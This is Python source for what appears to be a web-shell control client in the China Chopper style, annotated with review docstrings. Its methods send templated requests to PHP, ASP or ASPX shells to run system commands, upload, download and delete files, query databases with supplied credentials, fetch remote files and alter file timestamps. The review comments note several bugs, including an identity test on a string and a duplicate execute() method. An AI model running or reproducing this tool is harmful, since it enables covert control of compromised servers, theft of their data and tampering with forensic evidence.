def __init__(self, **kwargs):
    """Set up the client from keyword options and the module-level CONF.

    All keyword arguments are forwarded unchanged to the parent
    initialiser. Four attributes are then read from CONF, each with a
    hard-coded fallback, and the base template is built last.

    Attributes set here:
        flag: marker string (default 'M@M'); getbase() interpolates it
            into the ASP/ASPX base templates.
        k1, k2, k3: strings used by uploadfile()/savefile() as request
            parameter names and as '#K1#'/'#K2#' substitutions
            (defaults 'k1', 'k2', 'k3'). k3 is not used in the methods
            visible here.
        base: value returned by getbase().
    """
    super().__init__(**kwargs)
    # (attribute, CONF key, fallback) in the original assignment order.
    # The fallbacks are fixed strings, so a deployment that leaves CONF
    # untouched produces the same marker and parameter names every time.
    for attr, conf_key, fallback in (
        ('flag', 'FLAG', 'M@M'),
        ('k1', 'K1', 'k1'),
        ('k2', 'K2', 'k2'),
        ('k3', 'K3', 'k3'),
    ):
        setattr(self, attr, CONF.get(conf_key, fallback))
    # getbase() reads self.flag, so it has to run after the loop above.
    self.base = self.getbase()
def uploadfile(self, path, content):
    """Send the UPLOADFILE action for *path* with *content* as the payload.

    The template CONF['UPLOADFILE'][self.type.upper()] is filled with
    *path*, the '#K1#' / '#K2#' placeholders are replaced by self.k1 /
    self.k2, and the result goes through self.generate(). *content* is
    then appended as the value of the parameter named self.k1 and the
    whole string is handed to self.POST(), whose return value is returned.
    generate() and POST() are defined outside this listing.
    """
    template = CONF.get('UPLOADFILE').get(self.type.upper())
    pl = (template % path).replace('#K1#', self.k1)
    # Only touch self.k2 when the template actually references it.
    if '#K2#' in pl:
        pl = pl.replace('#K2#', self.k2)
    # content is concatenated as-is; this method applies no encoding.
    params = self.generate(pl) + '&' + self.k1 + '=' + content
    # NOTE(review): this is an identity test (`is`) against a string
    # literal, not an equality test, and the right-hand side adds an int
    # to a str. Presumably this branch does not run as written - confirm
    # before relying on a length parameter appearing in ASP requests.
    if self.type.lower() is 'asp':
        params += '&' + self.k2 + '=' + len(content)
    return self.POST(params)
def getbase(self):
    """Return the base template for the current self.type.

    Reads CONF['<TYPE>_BASE'] (empty string when absent) and fills it
    with %-formatting:

    * php  - the literal 'action'
    * asp  - (self.flag, 'action', self.flag)
    * aspx - (self.flag, 65001, 'action', self.flag)

    Any other type gets the template back unformatted.
    """
    pl = CONF.get(self.type.upper() + '_BASE', '')
    kind = self.type.lower()
    if kind == 'php':
        return pl % 'action'
    if kind == 'asp':
        # self.flag is interpolated twice; presumably it brackets the
        # response so the client can locate it - confirm in the template.
        return pl % (self.flag, 'action', self.flag)
    if kind == 'aspx':
        # 65001 is presumably the UTF-8 code page id - TODO confirm
        # against the ASPX_BASE template.
        return pl % (self.flag, 65001, 'action', self.flag)
    return pl
def database(self, connstr):
    """Send the database-listing action built from *connstr*.

    For type 'php' the connection string is split by self.parse_connstr()
    into (dbtype, host, user, password, dbname, charset, and a seventh
    field `dbp`) and the template CONF['DB_PHP_<DBTYPE>_DBLIST'] is filled
    with the subset each engine's branch uses. For 'asp'/'aspx' the
    string goes through self.parse_ado() and into
    CONF['DB_<TYPE>_ADO_DBLIST'].

    The host, user and password from *connstr* are interpolated into the
    template verbatim, so they are part of whatever self.generate()
    produces for the request.

    NOTE(review): if self.type or the parsed dbtype matches none of the
    branches, `pl` is never assigned and the generate() call raises
    UnboundLocalError.
    """
    kind = self.type.lower()
    if kind == 'php':
        dbtype, hst, usr, pwd, dbn, dbl, dbp = self.parse_connstr(connstr)
        engine = dbtype.upper()
        key = '_'.join(('DB_PHP', engine, 'DBLIST'))
        if engine == 'MYSQL':
            # Fall back to the 'mysql' schema and utf-8 when the
            # connection string leaves them empty.
            dbn = dbn or 'mysql'
            dbl = dbl or 'utf-8'
            pl = CONF.get(key) % (hst, usr, pwd, dbn, dbl)
        elif engine == 'MSSQL':
            pl = CONF.get(key) % (hst, usr, pwd, dbn)
        elif engine in ('INFORMIX', 'ORACLE'):
            pl = CONF.get(key) % (hst, usr, pwd)
        elif engine == 'POSTGRESQL':
            pl = CONF.get(key) % (hst, usr, pwd, dbn, dbp)
    elif kind in ('asp', 'aspx'):
        conn = self.parse_ado(connstr)
        pl = CONF.get('DB_' + self.type.upper() + '_ADO_DBLIST') % conn
    return self.POST(self.generate(pl))
def execute(self, connstr, sql, database=None):
    """Send the execute-SQL action for *sql* using *connstr*.

    Mirrors database(): for type 'php' the connection string is parsed
    by self.parse_connstr() and CONF['DB_PHP_<DBTYPE>_EXECUTESQL'] is
    filled per engine; for 'asp'/'aspx' self.parse_ado() feeds
    CONF['DB_<TYPE>_ADO_EXECUTESQL']. When *database* is given it takes
    precedence over the database name in *connstr* (not used for
    INFORMIX or the ADO branch).

    *sql* and the credentials are interpolated into the template
    verbatim; no escaping happens in this method.

    NOTE(review): a second method named execute(cmd_path, cmd) appears
    later in this listing. If both belong to the same class the later
    definition replaces this one - confirm. As in database(), an
    unmatched type or dbtype leaves `pl` unassigned and the generate()
    call raises UnboundLocalError.
    """
    kind = self.type.lower()
    if kind == 'php':
        dbtype, hst, usr, pwd, dbn, dbl, dbp = self.parse_connstr(connstr)
        engine = dbtype.upper()
        key = '_'.join(('DB_PHP', engine, 'EXECUTESQL'))
        if engine == 'MYSQL':
            dbn = database or dbn or 'mysql'
            dbl = dbl or 'utf-8'
            pl = CONF.get(key) % (hst, usr, pwd, dbn, sql, dbl)
        elif engine in ('MSSQL', 'ORACLE'):
            dbn = database or dbn
            pl = CONF.get(key) % (hst, usr, pwd, dbn, sql)
        elif engine == 'INFORMIX':
            pl = CONF.get(key) % (hst, usr, pwd, sql)
        elif engine == 'POSTGRESQL':
            dbn = database or dbn
            pl = CONF.get(key) % (hst, usr, pwd, dbn, dbp, sql)
    elif kind in ('asp', 'aspx'):
        conn = self.parse_ado(connstr)
        pl = CONF.get('DB_' + self.type.upper() + '_ADO_EXECUTESQL') % (conn, sql)
    return self.POST(self.generate(pl))
def settime(self, fname, time):
    """Send the SETTIME action for (*fname*, *time*).

    Fills CONF['SETTIME'][self.type.upper()] with both arguments via
    %-formatting, passes the result through self.generate() and returns
    whatever self.POST() returns. Presumably this rewrites the file's
    timestamp on the remote side, which matters for anyone relying on
    file times during triage - confirm against the template.
    """
    template = CONF.get('SETTIME').get(self.type.upper())
    return self.POST(self.generate(template % (fname, time)))
def wget(self, rpath, lpath):
    """Send the WGET action for (*rpath*, *lpath*).

    Fills CONF['WGET'][self.type.upper()] with both arguments, runs the
    result through self.generate() and returns the self.POST() result.
    Which side each path refers to is decided by the template, which is
    not visible here.
    """
    template = CONF.get('WGET').get(self.type.upper())
    return self.POST(self.generate(template % (rpath, lpath)))
def newfolder(self, name):
    """Send the NEWFOLDER action for *name*.

    Fills CONF['NEWFOLDER'][self.type.upper()] with *name*, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('NEWFOLDER').get(self.type.upper())
    return self.POST(self.generate(template % name))
def pastefile(self, src, dest):
    """Send the PASTEFILE action for (*src*, *dest*).

    Fills CONF['PASTEFILE'][self.type.upper()] with both paths, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('PASTEFILE').get(self.type.upper())
    return self.POST(self.generate(template % (src, dest)))
def downfile(self, path):
    """Send the DOWNFILE action for *path*.

    Fills CONF['DOWNFILE'][self.type.upper()] with *path*, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('DOWNFILE').get(self.type.upper())
    return self.POST(self.generate(template % path))
def savefile(self, path, content):
    """Send the SAVETXTFILE action for *path* with *content* as the text.

    Fills CONF['SAVETXTFILE'][self.type.upper()] with *path*, replaces
    the '#K1#' placeholder with self.k1, and runs the result through
    self.generate(). *content* is appended as the value of the parameter
    named self.k1 before the string is handed to self.POST().
    """
    template = CONF.get('SAVETXTFILE').get(self.type.upper())
    pl = (template % path).replace('#K1#', self.k1)
    # content is concatenated as-is; this method applies no encoding.
    params = self.generate(pl) + '&' + self.k1 + '=' + content
    return self.POST(params)
def showtxt(self, path):
    """Send the SHOWTXTFILE action for *path*.

    Fills CONF['SHOWTXTFILE'][self.type.upper()] with *path*, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('SHOWTXTFILE').get(self.type.upper())
    return self.POST(self.generate(template % path))
def execute(self, cmd_path, cmd):
    """Send the SHELL action for (*cmd_path*, *cmd*).

    Fills CONF['SHELL'][self.type.upper()] with both arguments, runs the
    result through self.generate() and returns the self.POST() result.
    Both values are interpolated verbatim; no escaping happens here.

    NOTE(review): an earlier method in this listing is also named
    execute(connstr, sql, database=None). If both belong to the same
    class, this definition replaces the earlier one - confirm.
    """
    template = CONF.get('SHELL').get(self.type.upper())
    return self.POST(self.generate(template % (cmd_path, cmd)))
def getinfo(self):
    """Send the GETBASEINFO action.

    The template CONF['GETBASEINFO'][self.type.upper()] takes no
    arguments; it is passed to self.generate() unchanged and the
    self.POST() result is returned.
    """
    template = CONF.get('GETBASEINFO').get(self.type.upper())
    return self.POST(self.generate(template))
def rename(self, src, dest):
    """Send the RENAME action for (*src*, *dest*).

    Fills CONF['RENAME'][self.type.upper()] with both names, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('RENAME').get(self.type.upper())
    return self.POST(self.generate(template % (src, dest)))
def showfolder(self, path):
    """Send the SHOWFOLDER action for *path*.

    Fills CONF['SHOWFOLDER'][self.type.upper()] with *path*, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('SHOWFOLDER').get(self.type.upper())
    return self.POST(self.generate(template % path))
def deletefile(self, path):
    """Send the DELETEFILE action for *path*.

    Fills CONF['DELETEFILE'][self.type.upper()] with *path*, runs the
    result through self.generate() and returns the self.POST() result.
    """
    template = CONF.get('DELETEFILE').get(self.type.upper())
    return self.POST(self.generate(template % path))